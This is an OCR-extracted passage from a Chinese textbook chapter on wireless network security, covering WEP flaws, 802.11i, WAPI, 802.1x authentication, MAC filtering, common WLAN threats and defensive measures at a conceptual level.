给 客户 端 , 如 果 能 够 监听 一 个 成 功 的 客户 端 与 AP 之 间 身 份 认证 的 过 程 , 截 获 它 们 双方 之 间 
相互 发 送 的 数据 包 , 通 过 把 随机 数 与 加 密 值 相 异 或 ,就 可 以 得 到 密 钥 流 。 而 拥有 了 该 密 钥 
流 ,任何 人 都 可 以 向 AP 提出 访问 请 求 。 这 样 ,WEP 协议 所 使 用 的 身份 认证 方式 ,对 于 具有 
监听 和 截获 数据 能 力 的 攻击 者 来 说 几乎 形同虚设 。 

当前 基于 WEP 加 密 技 术 的 安全 缺陷 饱 受 非议 , 因 针对 WEP 数据 包 加 密 已 有 破译 的 方 
法 , 且 使 用 这 一 方法 破解 WEP 密 钥 的 工具 可 以 在 互联 网 上 免费 下 载 。 相 应 地 ,替代 WEP 
的 WPA 标准 已 于 2002 年 下 半年 出 台 了 ,通过 暂时 密 钥 集成 协议 (TKIP) 增 强 了 数据 加 密 ， 
提高 无 线 网 络 的 安全 特性 。 


9.3.2 IEEE 802. 11i 安全 标准 


IEEE 802. 11 的 i 工作 组 致力 于 制定 被 称 为 IEEE 802. 11i 的 新 一 代 安 全 标准 ,这 种 安 
全 标准 为 了 增强 WLAN 的 数据 加 密 和 认证 性 能 ,定义 了 RSN(Robust Security Network) 
的 概念 ,并 且 针 对 WEP 加 密 机 制 的 各 种 缺陷 做 了 多 方面 的 改进 。 

IEEE 802. 11i 规定 使 用 802. 1x 认证 和 密 钥 管理 方式 ,在 数据 加 密 方面 ,定义 了 TKIP 
(Temporal Key Integrity Protocol) .CCMP(Counter-Mode/CBC-MAC Protocol) 和 WRAP 
(Wireless Robust Authenticated Protocol)3 种 加 密 机 制 。 其 中 ,TKIP 采用 WEP 机 制 里 的 
RC4 作为 核心 加 密 算 法 ,可 以 通过 在 现 有 的 设备 上 升级 固件 和 驱动 程序 的 方法 达到 提高 
WLAN 安全 的 目的 。CCMP 机 制 基于 AES(Advanced Encryption Standard) 加 密 算法 和 
CCM(Counter-Mode/CBC-MAC) 认 证 方式 ,使 得 WLAN 的 安全 程度 大 大 提高 ,是 实现 
RSN 的 强制 性 要 求 。 由 于 AES 对 硬件 要 求 比较 高 ,因此 CCMP 无 法 通过 在 现 有 设备 的 基 
础 上 进行 升级 实现 。 
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TKIP 与 WEP 一 样 基于 RC4 加 密 算 法 ,但 相 比 于 WEP 算法 ,将 WEP 密 钥 的 长 度 由 
40 位 加 长 到 128 位 ,初始 化 向 量 IV 的 长 度 由 24 位 加 长 到 48 位 ,由 于 WEP 算法 的 安全 漏 
洞 是 由 WEP 机 制 本 身 引 起 的 ,与 密 钥 的 长 度 无 关 , 即 使 增加 加 密 密 钥 的 长 度 , 也 不 可 能 增 
强 其 安全 程度 。 初 始 化 向 量 (IV) 长 度 的 增加 也 只 能 在 有 限 程度 上 提高 破解 难度 ,如 延长 破 
解 信息 收集 时 间 ,并 不 能 从 根本 上 解决 问题 ,因为 作为 安全 关键 的 加 密 部 分 ,TKIP 没有 脱 
离 WEP 的 核心 机 制 。 

IEEE 802. 11i 标准 的 终极 加 密 解 决 方案 为 基于 IEEE 802. 1x 认证 的 CCMP 加 密 技术 ， 
即 以 AES(Advanced Encryption Standard) 为 核心 算法 ,采用 CBC-MAC 加 密 模式 ,具有 分 
组 序号 的 初始 向 量 。CCMP 为 128 位 的 分 组 加 密 算法 , 相 比 前 面 所 述 的 所 有 算法 安全 程度 
更 高 。 


9.3.3 WAPI 协议 


我 国 早 在 2003 年 5 月 就 提出 了 无 线 局 域 网 国家 标准 GB 15629. 11, 这 是 目前 我 国 在 这 
一 领域 唯一 获得 批准 的 协议 。 标 准 中 包含 了 全 新 的 WAPI(WLAN Authentication and 
Privacy Infrastructure) 安 全 机 制 ,这 种 安全 机 制 由 WAI (WLAN Authentication Infrastructure) 
和 WPICWLAN Privacy Infrastructure) 两 部 分 组 成 ,WAI 和 WPI 分 别 实现 对 用 户 身份 的 
鉴别 和 对 传输 数据 的 加 密 。WAPI 能 为 用 户 的 WLAN 系统 提供 全 面 的 安全 保护 。WAPI 
安全 机 制 包 括 两 个 组 成 部 分 。 

WAI 采 用 公开 密 钥 密码 体制 ,利用 证 书 来 对 WLAN 系统 中 的 STA 和 AP 进行 认证 。 
WAI 定 义 了 一 种 名 为 ASU(Authentication Service Unit) 的 实体 ,用 于 管理 参与 信息 交换 
各 方 所 需要 的 证 书 ( 包 括 证 书 的 产生 、 颁 发 .吊销 和 更 新 )。 证 书 里 面包 含有 证 书 颁发 者 
(ASU) 的 公 钥 和 签名 ,以 及 证 书 持 有 者 的 公 钥 和 签名 (这 里 的 签名 采用 的 是 WAPI 特有 的 
椭圆 曲线 数字 签名 算法 ) ,是 网 络 设备 的 数字 身份 凭证 。 

在 具体 实现 中 ,STA 在 关联 到 AP 之 后 ,必须 相互 进行 身份 鉴别 。 先 由 STA 将 自己 的 
证 书 和 当前 时 间 提 交 给 AP; 然后 AP 将 STA 的 证 书 、 提 交 时 间 和 自己 的 证 书 一 起 用 自己 
的 私 钥 形 成 签名 ; 最 后 将 这 个 签名 连同 这 三 部 分 一 起 发 给 ASU 。 

所 有 的 证 书 鉴别 都 由 ASU 来 完成 , 当 其 收 到 AP 提交 来 的 鉴别 请 求 之 后 ,会 先 验证 AP 的 签 
名 和 证 书 。 当 鉴别 成 功 之 后 ,进一步 验证 STA 的 证 书 。 最 后 ,ASU 将 STA 的 鉴别 结果 信息 和 
AP 的 鉴别 结果 信息 用 自己 的 私 钥 进行 签名 ,并 将 这 个 签名 连同 这 两 个 结果 发 回 给 AP。 

AP 对 收 到 的 结果 进行 签名 验证 ,并 得 到 对 STA 的 鉴别 结果 ,根据 这 一 结果 来 决定 是 
否 人 允许 该 STA 接 人 。 同 时 AP 需要 将 ASU 的 验证 结果 转发 给 STA,STA 也 要 对 ASU 的 
签名 进行 验证 ,并 得 到 AP 的 鉴别 结果 ,根据 这 一 结果 来 决定 是 否 接 人 AP。 由 于 WAI 中 对 
STA 和 AP 进行 了 双向 认证 ,因此 对 于 采用 “ 假 ”AP 的 攻击 方式 具有 很 强 的 抵御 能 力 。 

在 STA 和 AP 的 证 书 都 鉴别 成 功 之 后 ,双方 将 会 进行 密 钥 协商 。 首 先 双 方 进行 密 钥 算 
法 协商 ; 然后 STA 和 AP 各 自 会 产生 一 个 随机 数 , 用 自己 的 私 钥 加 密 之 后 传输 给 对 方 ; 最 
后 通信 的 两 端 会 采用 对 方 的 公 钥 将 对 方 所 产生 的 随机 数 还 原 , 再 将 这 两 个 随机 数 模 运 算 的 
结果 作为 会 话 密 钥 ,并 依据 之 前 协商 的 算法 采用 这 个 密 钥 对 通信 的 数据 加 密 。 

由 于 会 话 密 钥 并 没有 在 信道 上 进行 传输 ,因此 就 增强 了 其 安全 性 。 为 了 进一步 提高 通 
信 的 保密 性 ,WAPI 还 规定 ,在 通信 一 段 时 间或 者 交换 一 定数 量 的 数据 之 后 ,STA 和 AP 之 
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间 可 以 重新 协商 会 话 密 钥 。WAPI 采 用 对 称 密码 算法 实现 对 MAC 层 MSDU 进行 的 加 、 解 
密 操作 。WAPI 标准 将 替代 国际 现行 的 WEP 协议 , 原 有 标准 因 其 安全 性 不 理想 ,一 直 以 来 
都 为 全 球 用 户 所 诉 病 。 而 采纳 了 许多 先进 技术 的 新 标准 ,无 疑 为 推动 国内 WLAN 产业 发 
展 起 到 了 积极 的 作用 。 同 时 , 牵 一 发 而 动 全 身 的 安全 新 标准 ,也 已 影响 到 电信 产业 链 上 的 诸 
多 环节 ,格局 变幻 暗流 涌 动 。 但 同时 更 为 关键 的 是 ,由 于 WAPI 协议 提供 了 优秀 的 认证 和 
安全 机 制 , 因 此 它 非常 适合 于 运营 商 的 公众 无 线 局 域 网 (PWLAN) 运 营 。 这 除了 给 现 有 运 
营 商 带 来 利益 之 外 ,也 极 有 可 能 因此 衍生 出 更 多 的 WLAN 服务 提供 商 。 

然而 就 是 这 样 一 项 标准 ,由 于 理解 上 的 差异 遭 到 了 多 方面 质疑 。 一 些 业 内 人 士 指出 ,由 
于 新 标准 与 先行 标准 差异 较 大 ,因此 可 能 存在 漫游 及 设备 兼容 等 一 些 问题 ,而且 ,一 些 对 安 
全 问题 并 不 敏感 的 用 户 的 使 用 成 本 也 可 能 会 增加 。 

事实 上 ,这 只 是 标准 推出 初期 不 可 避免 的 问题 。 而 且 根 据 专 家 介绍 ,设备 仅 需 要 进行 简 
单 的 软件 升级 即 可 达到 规范 要 求 , 过 程 平滑 。 同 时 , 若 从 WLAN 产业 长 期 发 展 的 角度 来 
看 ,这 一 代价 也 是 完全 值得 的 。 

WAPI 充分 考虑 了 市 场 应 用 ,从 应 用 模式 上 可 分 为 单 点 式 和 集中 式 两 种 : 单 点 式 主要 
用 于 家 庭 和 小 型 公司 的 小 范围 应 用 ; 集中 式 主要 用 于 热点 地 区 和 大 型 企业 ,可 以 和 运营 商 
的 管理 系统 结合 起 来 ,共同 搭建 安全 的 无 线 应 用 平台 。 因 此 ,采用 WAPI 可 以 彻底 扭转 目前 
WLAN 多 种 安全 机 制 并 存 且 互 不 兼容 的 现状 ,从 而 在 根本 上 解决 安全 问题 和 兼容 性 问题 。 


9.4 无 线 网 络 主要 信息 安全 技术 


9.4.1 服务 集 标识 符 (SSID) 


服务 集 标识 符 (Service Set Identifier, SSID) 将 一 个 无 线 局 域 网 分 为 几 个 不 同 的 子 网 
络 , 每 一 个 子 网 络 都 有 其 对 应 的 身份 标识 (SSID) ,只 有 无 线 终端 设置 了 配对 的 SSID 才 接 入 
相应 的 子 网 络 ,防止 未 被 授权 的 用 户 进 入 本 网 络 , 同 时 对 资源 的 访问 权限 进行 区 别 限制 。 
SSID 是 相 邻 的 无 线 接 人 点 (AP) 区 分 的 标志 ,无 线 接 人 用 户 必须 设 定 SSID 才能 和 AP 通 
信 。 通 常 SSID 须 事先 设置 于 所 有 使 用 者 的 无 线 网 卡 及 AP 中 。 尝 试 连接 到 无 线 网 络 的 系 
统 在 被 允许 进入 之 前 必须 提供 SSID ,这 是 唯一 标识 网 络 的 字符 串 。 所 以 可 以 认为 SSID 是 
一 个 简单 的 口令 ,提供 了 口令 认证 机 制 ,实现 了 一 定 的 安全 性 。 

但 是 SSID 对 于 网 络 中 所 有 用 户 都 是 相同 的 字符 串 ,其 安全 性 差 , 人 们 可 以 轻易 地 从 每 
个 信息 包 的 明文 里 窃取 到 它 。 企 业 级 无 线 应 用 绝 不 能 只 依赖 这 种 技术 做 安全 保障 ,而 只 能 
作为 区 分 不 同 无 线 服 务 区 的 标识 。 


9.4.2 802.11 的 认证 机 制 


1. 802. 1x 认证 技术 

802. 1x 是 针对 以 太 网 而 提出 的 基于 端口 进行 网 络 访问 控制 的 安全 性 标准 草案 。 基 于 
端口 的 网 络 访问 控制 利用 物理 层 特性 对 连接 到 LAN 端口 的 设备 进行 身份 认证 。 如 果 认 证 
失败 , 则 禁止 该 设备 访问 LAN 资源 。 
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尽管 802. 1x 标准 最 初 是 为 有 线 以 太 网 设计 制定 的 ,但 它 也 适用 于 符合 802. 11 标准 的 
无 线 局 域 网 , 且 被 视 为 是 WLAN 的 一 种 增强 性 网 络 安全 解决 方案 。802. 1x 体系 结构 包括 
3 个 主要 的 组 件 。 

(1) 请 求 方 (supplicant) : 提出 认证 申请 的 用 户 接 入 设备 ,在 无 线 网 络 中 ,通常 指 待 接 入 
网 络 的 无 线 客户 机 STA。 

(2) 认证 方 Cauthenticator) : 允许 客户 机 进行 网 络 访问 的 实体 ,在 无 线 网 络 中 ,通常 指 
访问 接 人 点 AP。 

(3) 认证 服务 器 (authentication server) : 为 认证 方 提供 认证 服务 的 实体 。 认 证 服务 器 
对 请 求 方 进行 验证 ,然后 告知 认证 方 该 请 求 者 是 否 为 授权 用 户 。 认 证 服务 器 可 以 是 某 个 单 
独 的 服务 器 实体 ,也 可 以 不 是 ,后 一 种 情况 通常 是 将 认证 功能 集成 在 认证 方 Authenticator 中 。 

802. 1x 草案 为 认证 方 定义 了 两 种 访问 控制 端口 , 即 “ 受 控 ” 端 口 和 “ 非 受 控 ”端口 。“ 受 
控 ” 端 口 分 配给 那些 已 经 成 功 通过 认证 的 实体 进行 网 络 访问 ; 而 在 认证 尚未 完成 之 前 ,所 有 
的 通信 数据 流 从 “ 非 受 控 ”端口 进出 。“ 非 受 控 ”端口 只 允许 通过 802. 1x 认证 数据 ,一 旦 认证 
成 功 通过 ,请 求 方 就 可 以 通过 “ 受 控 ”端口 访问 LAN 资源 和 服务 。 

802. 11 技术 是 一 种 增强 型 的 网 络 安全 解决 方案 。 在 采用 802. 11 的 无 线 LAN 中 ,无 线 
用 户 端 安装 802. 11 客户 端 软 件 作为 请 求 方 ,无 线 访问 点 AP 内 嵌 802. 11 认证 代理 作为 认 
证 方 ,同时 它 还 作为 Radius 认证 服务 器 的 客户 端 ,负责 用 户 与 Radius 服务 器 之 间 认 证 信息 的 
转发 。802. 1x 认证 一 般 包 括 以 下 几 种 EAP(Extensible Authentication Protocol) 认 证 模式 。 

(1) EAP-MD5 。 

(2) EAP-TLS(Transport Layer Security) 。 

(3) EAP-TTLS(Tunnelled Transport Layer Security) 。 

(4) EAP-PEAP(Protected EAP) 。 

(5) EAP-LEAP(Lightweight EAP) 。 

(6) EAP-SIM 。 

2. IEEE 802. 11 定义 了 两 种 认证 方式 

IEEE 802. 11 定义 了 两 种 认证 方式 : 开放 系统 认证 (open system authentication) 和 共享 密 
钥 认 证 (shared key authentication) 。 顾 名 思 义 ,开放 系统 认证 就 是 开放 型 的 认证 方式 , 凡 使 用 
开放 系统 认证 的 工作 站 都 能 被 成 功 认证 。 它 是 一 种 默认 的 认证 机 制 , 认 证 以 明文 形式 进行 , 适 
合 安全 要 求 较 低 的 场所 。 认 证 过 程 只 有 两 步 : 认证 请 求 和 认证 响应 ,如 图 9-5 所 示 。 

算法 标识 = “开放 系统 ” 
验证 处 理 序列 号 =1 
请 求 帧 
验证 由 
”验证 算法 标识 -<“ 开 放 系统 ” 


验证 处 理 序列 号 =2 
验证 请 求 的 结果 


9-5 开放 系统 认证 过 程 


共享 密 钥 认证 是 客户 端 需要 放送 与 接 人 点 预存 密 钥 匹配 的 密 钥 。 它 是 可 选 的 认证 机 
制 。802. 11 提供 的 共享 密 钥 认证 是 单 向 认证 , 即 只 认证 工作 站 的 合法 性 ,没有 认证 AP 的 
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合法 性 。 共 享 密 钥 认 证 过 程 有 4 个 步骤 。 

(1) 客户 端 向 接 人 点 发 送 认 证 请 求 。 

(2) 接 入 点 发 回 一 个 明文 。 

(3) 客户 端 利用 预存 的 密 钥 对 明文 加 密 , 再 次 向 接 入 点 发 出 认证 请 求 。 

(4) 接 入 点 对 数据 包 进 行 解密 ,比较 明文 ,并 决定 是 否 接受 请 求 。 

共享 密 钥 认证 的 安全 性 高 于 开放 式 系 统 认证 ,但 是 就 目前 的 技术 而 言 ,完全 可 以 无 视 这 
种 认证 。 另外 ,其 他 认证 方式 还 有 SSID 认证 。SSID 可 以 防止 一 个 工作 站 意外 的 链接 到 AP 
上 ,但 不 是 为 提供 认证 服务 而 设计 的 。SSID 在 AP 广播 的 信 标 帧 中 是 明文 形式 传送 的 , 即 
使 在 信 标 帧 中 关闭 了 SSID, 非 授权 用 户 也 可 通过 监听 和 轮 询 响应 帧 来 得 到 SSID。 

3. 802. 11 认证 机 制 的 优点 

802. 11 认证 技术 的 优点 主要 表现 在 以 下 几 个 方面 。 

(1) 802. 1x 协议 仅仅 关注 受 控 端 口 的 打开 与 关闭 。 

(2) 接 入 认证 通过 之 后 ,IP 数据 包 在 二 层 普 通 MAC 帧 上 传送 。 

(3) 由 于 是 采用 Radius 协议 进行 认证 ,因此 可 以 很 方便 地 与 其 他 认证 平台 进行 对 接 。 

(4) 提供 基于 用 户 的 计 费 系统 。 

4. 802. 11 认证 技术 的 缺点 

802. 11 认证 技术 的 缺点 主要 表现 在 以 下 几 个 方面 。 

(1) 只 提供 用 户 接 入 认证 机 制 ,没有 提供 认证 成 功 之 后 的 数据 加 密 。 

(2) 一 般 只 提供 单 向 认证 。 

(3) 它 提供 STA 与 RADIUS 服务 器 之 间 的 认证 ,而 不 是 与 AP 之 间 的 认证 。 

(4) 用 户 的 数据 仍然 是 使 用 的 RC4 进行 加 密 。 


9.4.3 无 线 网 卡 物理 地 址 (MAC) 过 滤 


每 个 无 线 工 作 站 网 卡 都 有 唯一 的 物理 地 址 (MAC) 标 识 ,该 物理 地 址 编码 方式 类 似 于 以 
太 网 物理 地 址 ,是 48 位 。 网 络 管理 员 可 在 无 线 局 域 网 访问 点 AP 中 手工 维护 一 组 允许 通过 
AP 访问 网 络 地 址 列表 ,以 实现 基于 物理 地 址 的 访问 过 滤 。 

MAC 地 址 是 每 块 网 卡 固定 的 物理 地 址 , 它 在 网 卡 出 厂 时 就 已 经 设 定 。MAC 地 址 过 滤 
的 策略 就 是 使 无 线路 由 器 只 允许 部 分 MAC 地 址 的 网 络 设 备 进行 通信 ,或 者 禁止 那些 黑 名 
单 中 的 MAC 地 址 访问 。MAC 地 址 的 过 滤 策 略 是 无 线 通信 网 络 的 一 个 基本 的 而 且 有 用 的 
措施 , 它 唯 一 的 不 足 是 必须 手动 输入 MAC 地 址 过 滤 标准 。 启 用 MAC 地 址 过 滤 ,无 线路 由 
器 获取 数据 包 后 ,就 会 对 数据 包 进 行 分 析 。 如 果 此 数据 包 是 从 所 禁止 的 MAC 地 址 列表 中 
发 送出 的 ,那么 无 线路 由 器 就 会 丢弃 此 数据 包 , 不 进行 任何 处 理 。 因 此 对 于 恶意 的 主机 , 即 
使 不 断 改 变 IP 地 址 也 没有 用 。 

MAC 地 址 过 滤 的 优点 主要 有 简化 了 访问 控制 .可 以 接受 或 拒绝 预先 设 定 的 用 户 、 被 过 
滤 的 MAC 不 能 进行 访问 及 提供 了 第 2 层 的 防护 。 但 MAC 地 址 过 滤 也 有 和 缺点。 因为 ,这 个 
方案 要 求 AP 中 的 MAC 地 址 列表 必须 随时 更 新 ,可 扩展 性 差 ; 而 且 MAC 地 址 在 理论 上 可 
以 伪造 ,因此 这 也 是 较 低级 别 的 授权 认证 。 物 理 地 址 过 滤 属于 硬件 认证 ; 而 不 是 用 户 认证 。 
这 种 方式 要 求 AP 中 的 MAC 地 址 列表 必须 随时 更 新 ,目前 都 是 手工 操作 ; 如 果 用 户 增加 ， 
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则 扩展 能 力 很 差 , 因 此 只 适合 于 小 型 网 络 规模 。 
9.4.4 数据 加 密 


1. 连 线 对 等 保密 (WEP) 

在 链 路 层 采 用 RC4 对 称 加 密 技术 ,用 户 的 加 密 密 钥 必须 与 AP 的 密 钥 相同 时 才能 获准 
存 取 网 络 的 资源 ,从 而 防止 非 授 权 用 户 的 监听 及 非法 用 户 的 访问 。WEP 提供 了 40 位 (有 时 
也 称 为 64 位 ) 和 128 位 长 度 的 密 钥 机 制 , 但 是 它 仍然 存在 许多 缺陷 ,如 一 个 服务 区 内 的 所 有 
用 户 都 共享 同一 个 密 钥 ,一 个 用 户 丢 失 钥 匙 将 使 整个 网 络 不 安全 。 而 且 40 位 的 钥匙 在 今天 
很 容易 被 破解 ; 钥匙 是 静态 的 ,要 手工 维护 ,扩展 能 力 差 。 目 前 为 了 提高 安全 性 ,建议 采用 
128 位 加 密 钥 匙 。 

IEEE 802. 11b、IEEE 802. 11a 及 IEEE 802. 11g 协议 中 都 包含 无 线 等 效 协议 , 它 可 以 
对 每 一 个 企图 访问 无 线 网 络 的 人 的 身份 进行 识别 ,同时 对 网 络 传输 内 容 进行 加 密 。 尽 管 现 
有 无 线 网 络 标准 中 的 WEP 技术 遭 到 了 批评 ,但 如 果 能 够 正确 使 用 WEP 的 全 部 功能 ,那么 
WEP 仍 提供 了 在 一 定 程 度 上 比较 合理 的 安全 措施 。 这 意味 着 需要 更 加 注重 密 钥 管理 .避免 
使 用 缺 省 选项 ,并 确保 在 每 个 可 能 被 攻击 的 位 置 上 都 进行 了 足够 的 加 密 。WEP 使 用 了 
RC4 加 密 算 法 ,尽管 理论 上 的 分 析 认 为 WEP 技术 并 不 保险 ,但 是 对 于 普通 入 侵 者 而 言 ， 
WEP 已 经 是 一 道 难以 逾越 的 鸿沟 。 大 多 数 无 线路 由 器 都 使 用 至 少 支持 40 位 加 密 的 WEP， 
但 通常 还 支持 128 位 ,甚至 256 位 选项 。 在 试图 同 网 络 连接 的 时 候 , 客 户 端 设置 中 的 SSID 
和 密 钥 必 须 同 无 线路 由 器 的 匹配 ,否则 将 会 失败 。 

2，Wir-FEi 保护 接 入 (WPA) 

WPA(Wi-Fi Protected Access) 是 继承 了 WEP 基本 原理 而 又 解决 了 WEP 缺点 的 一 种 
新 技术 。 由 于 加 强 了 生成 加 密 密 钥 的 算法 ,因此 即便 收集 到 分 组 信息 并 对 其 进行 解析 ,也 几 
乎 无 法 计算 出 通用 密 钥 。 其 原理 为 根据 通用 密 钥 ,配合 表示 计算 机 MAC 地 址 和 分 组 信息 
顺序 号 的 编号 ,分 别 为 每 个 分 组 信息 生成 不 同 的 密 钥 。 然 后 与 WEP 一 样 将 此 密 钥 用 于 
RC4 加 密 处 理 。 通 过 这 种 处 理 , 所 有 客户 端的 所 有 分 组 信息 所 交换 的 数据 将 由 各 不 相同 的 
密 钥 加 密 而 成 。 无 论 收集 到 多 少 这 样 的 数据 ,要 想 破 解 出 原始 的 通用 密 钥 几乎 是 不 可 能 的 。 
WPA 还 追加 了 防止 数据 中 途 被 算 改 的 功能 和 认证 功能 。 由 于 具备 这 些 功 能 ,WEP 中 此 前 
倍 受 指责 的 缺点 得 以 全 部 解决 。WPA 不 仅 是 一 种 比 WEP 更 为 强大 的 加 密 方 法 ,而 且 有 更 
为 丰富 的 内 涵 。 作 为 802. 11i 标准 的 子 集 , WPA 包含 了 认证 ,加 密 和 数据 完整 性 校 验 3 个 
组 成 部 分 ,是 一 个 完整 的 安全 性 方案 。 


9.5 无 线 网 络 的 安全 缺陷 与 解决 方案 


9.5.1 无 线 网 络 的 安全 缺陷 


由 于 无 线 局 域 网 采用 公共 的 电磁 波 作为 载体 ,电磁 波 能 够 穿 过 天 花 板 、 玻 璃 .楼层 、 砖 、 
墙 等 物体 ,因此 在 一 个 无 线 局 域 网 接 人 点 (access point) 所 服务 的 区 域 中 ,任何 一 个 无 线 客 
户 端 都 可 以 接收 到 此 接 入 点 的 电磁 波 信号 :这样 就 可 能 包括 一 些 恶意 用 户 也 能 接收 到 其 他 
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无 线 数据 信号 。 这 样 恶意 用 户 在 无 线 局 域 网 中 相对 于 在 有 线 局 域 网 当中 ,去 窃听 或 干扰 信 
息 就 来 得 容易 得 多 。 

另外 ,由 于 无 线 移动 设备 在 存储 能 力 、 计 算 能 力 和 电源 供电 时 间 方 面 的 局 限 性 ,使 得 原 
来 在 有 线 环 境 下 的 许多 安全 方案 和 安全 技术 不 能 直接 应 用 于 无 线 环境 。 例 如 ,防火 墙 对 通 
过 无 线 电 波 进行 的 网 络 通 信和 起 不 了 作用 ,任何 人 在 区 域 范围 之 内 都 可 以 截获 和 插入 数据 。 
计算 量 大 的 加 密 、 解 密 算法 不 适合 用 于 移动 设备 等 。 因 此 ,需要 研究 新 的 适合 于 无 线 网 络 环 
境 的 安全 理论 ,安全 方法 和 安全 技术 。 与 有 线 网 络 相 比 ,无 线 网 络 所 面临 的 安全 威胁 更 加 严 
重 。 所 有 常规 有 线 网 络 中 存在 的 安全 威胁 和 隐患 都 依然 存在 于 无 线 网 络 中 ; 外 部 人 员 可 以 
通过 无 线 网 络 绕 过 防火 墙 , 对 专用 网 络 进行 非 授权 访问 ; 无 线 网 络 传 输 的 信息 容易 被 窃取 、 
算 改 和 插入 ; 无 线 网 络 容 易 受 到 拒绝 服务 攻击 (DoS) 和 干扰 ; 内 部 员工 可 以 设置 无 线 网 卡 
以 端 对 端 模式 与 外 部 人 员 直 接连 接 。 此 外 ,无 线 网 络 的 安全 技术 相对 比较 新 ,安全 产品 还 比 
较 少 。 以 无 线 局 域 网 (WLAN ) 为 例 ,移动 节点 、AP 等 每 一 个 实体 都 有 可 能 是 攻击 对 象 或 
攻击 者 。 由 于 无 线 网 络 在 移动 设备 和 传输 媒介 方面 的 特殊 性 ,使 得 一 些 攻击 更 容易 实施 ,对 
无 线 网 络 安全 技术 的 研究 比 有 线 网 络 的 限制 更 多 ,难度 更 大 。 无 线 网 络 在 信息 安全 方面 有 
着 与 有 线 网 络 不 同 的 特点 。 

WLAN 所 面临 的 安全 威胁 主要 有 以 下 几 类 。 

1. 网 络 窃听 

一 般 来 说 ,大 多 数 网 络 通信 都 是 以 明文 ( 非 加 密 ) 格 式 出 现 的 ,这 就 会 使 处 于 无 线 信号 覆 
盖 范 围 之 内 的 攻击 者 可 以 乘机 监视 并 破解 ( 读 取 ) 通 信 。 这 类 攻击 是 企业 管理 员 面 临 的 最 大 
安全 问题 。 如 果 没 有 基于 加 密 的 强 有 力 的 安全 服务 ,数据 就 很 容易 在 空气 中 传输 时 被 他 人 
读 取 并 利用 。 

2. AP 中 间 人 欺骗 

在 没有 足够 的 安全 防范 措施 的 情况 下 ,是 很 容易 受到 利用 非法 AP 进行 的 中 间 人 欺骗 
攻击 。 解 决 这 种 攻击 的 通常 做 法 是 采用 双向 认证 方法 ( 即 网 络 认 证 用 户 ,同时 用 户 也 认证 网 
络 ) 和 基于 应 用 层 的 加 密 认 证 (如 https 十 Web) 。 

3. WEP 破解 

现在 互联 网 上 存在 一 些 程序 ,能 够 捕捉 位 于 AP 信号 覆盖 区 域内 的 数据 包 , 收 集 到 足够 
的 WEP 弱 密 钥 加 密 的 包 , 并 进行 分 析 以 恢复 WEP 密 钥 。 根 据 监听 无 线 通 信 的 机 器 速度 、 
WLAN 内 发 射 信号 的 无 线 主机 数量 ,以 及 由 于 802. 11 帧 冲突 引起 的 IV 重 发 数量 ,最 快 可 
以 在 两 个 小 时 内 攻破 WEP 密 钥 。 

4. MAC 地 址 欺骗 

即使 AP 起 用 了 MAC 地 址 过 滤 ,使 未 授权 的 黑客 的 无 线 网 卡 不 能 连接 AP, 这 并 不 意 
味 着 能 阻止 黑客 进行 无 线 信号 监听 。 通 过 某 些 软件 分 析 截 获 的 数据 ,能 够 获得 AP 允许 通 
信 的 设备 的 MAC 地 址 ,这样 黑客 就 能 利用 MAC 地 址 伪装 等 手段 入 侵 网 络 了 。 

5. 窃取 网 络 资源 

有 些 用 户 喜欢 从 邻近 的 无 线 网 络 访问 互联 网 ,即使 他 们 没有 什么 恶意 企图 ,但 仍 会 占用 
大 量 的 网 络 带宽 ,严重 影响 网 络 性 能 。 而 更 多 的 不 速 之 客 会 利用 这 种 连接 从 公司 范围 内 发 
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送 邮 件 ,或 者 下 载 盗版 内 容 ,这 会 产生 一 些 法 律 问题 。 
9.5.2 无 线 网 络 的 安全 防范 措施 


基于 以 上 无 线 网 络 存 在 的 诸多 安全 隐患 ,那么 如 何 采取 恰当 的 方法 进行 防范 ,使 无 线 网 
络 的 安全 隐患 消灭 在 萌芽 状态 ,尽量 使 无 线 网 络 的 受 破坏 的 程度 减少 到 最 低 ,以 保证 无 线 网 
络 应 用 的 范围 普及 。 

下 面 介 绍 几 种 对 无 线 网 络 安全 技术 实现 的 措施 。 

1. 采用 强力 的 密码 

一 个 足够 强大 的 密码 可 以 让 暴力 破解 成 为 不 可 能 实现 的 情况 。 相 反 , 如 果 密 码 强度 不 
够 ,几乎 可 以 肯定 会 让 你 的 系统 受到 损害 。 

使 用 10 个 字符 以 上 的 密码 ,也 可 以 使 用 一 些 表达 ,如 “thisismywirelessnetworksecure” 等 取 
代 原 来 较 短 的 密码 ,或 者 使 用 更 为 复杂 的 密码 ,如 “W1flp4ss $ #”。 这 类 密码 更 具 安全 性 。 

2. 严禁 广播 服务 集合 标识 符 (SSID) 

SSID (Service Set Identifier) 是 无 线 网 络 用 于 定位 服务 的 一 项 功能 ,为 了 能 够 进行 通 
信 ,无 线路 由 器 和 主机 必须 使 用 相同 的 SSID。 在 通信 过 程 中 ,无 线路 由 器 首先 广播 其 
SSID, 任 何在 此 接收 范围 内 的 主机 都 可 以 获得 SSID, 使 用 此 SSID 值 对 自身 进行 配置 后 就 
可 以 和 无 线路 由 器 进行 通信 。 毫 无 疑问 ,SSID 的 使 用 暴露 了 路 由 器 的 位 置 ,这 会 带 来 潜在 
的 安全 问题 。 对 无 线路 由 器 进行 配置 ,禁止 服务 集合 标识 符 的 广播 ,尽管 不 能 带 来 真正 的 安 
全 ,但 至 少 可 以 减轻 受到 的 威胁 ,因为 很 多 初级 的 恶意 攻击 都 是 采用 扫描 的 方式 寻找 那些 有 
漏洞 的 系统 。 隐 藏 了 服务 集合 标识 符 , 这 种 可 能 就 大 大 降低 了 。 大 多 数 商 业 级 路 由 器 、 防 火 
墙 设备 都 提供 相关 的 功能 设置 。 提 高 安全 性 的 同时 ,也 在 某 种 程度 上 带 来 不 便 ,进行 通信 的 
客户 机 必须 手动 进行 SSID 配置 。 

3， 采用 有 效 的 无 线 加 密 方式 

动态 有 线 等 效 保密 (WEP) 并 不 是 效果 很 好 的 加 密 方 式 。 只 要 使 用 像 aircrack 一 样 免 
费 工具 ,就 可 以 在 短 短 的 几 分 钟 里 找 出 动态 有 线 等 效 保密 模式 加 密 过 的 无 线 网 络 中 的 漏洞 。 
无 线 网 络 保护 访问 (WPA) 是 目前 通用 的 加 密 标 准 , 你 很 可 能 已 经 使 用 了 。 当 然 , 如 果 有 可 
能 的 话 ,你 应 该 选择 使 用 一 些 更 强大 有 效 的 方式 。 毕 竟 ,加 密 和 解密 的 斗争 是 无 时 无 刻 不 在 
进行 的 。 

4. 可 能 的 话 , 采 用 不 同类 型 的 加 密 

